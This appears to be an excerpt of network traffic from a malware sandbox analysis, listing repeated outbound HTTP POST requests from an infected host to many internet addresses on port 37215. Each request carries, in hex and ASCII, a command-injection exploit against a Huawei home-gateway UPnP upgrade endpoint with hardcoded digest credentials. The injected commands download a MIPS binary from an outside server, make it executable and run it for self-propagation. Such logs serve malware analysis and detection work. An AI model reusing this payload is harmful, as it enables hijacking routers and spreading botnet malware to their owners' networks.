                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          342192.168.2.235726866.155.137.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178036928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          343192.168.2.2358064177.43.43.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178041935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          344192.168.2.2346602147.101.75.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178046942 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          345192.168.2.2340628197.11.244.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178059101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          346192.168.2.235230841.72.14.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178066015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          347192.168.2.2348022197.95.156.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178086042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          348192.168.2.235948841.92.28.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178096056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          349192.168.2.2348234157.141.5.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178100109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          350192.168.2.2342750157.192.131.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178126097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          351192.168.2.234229661.114.203.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178128958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
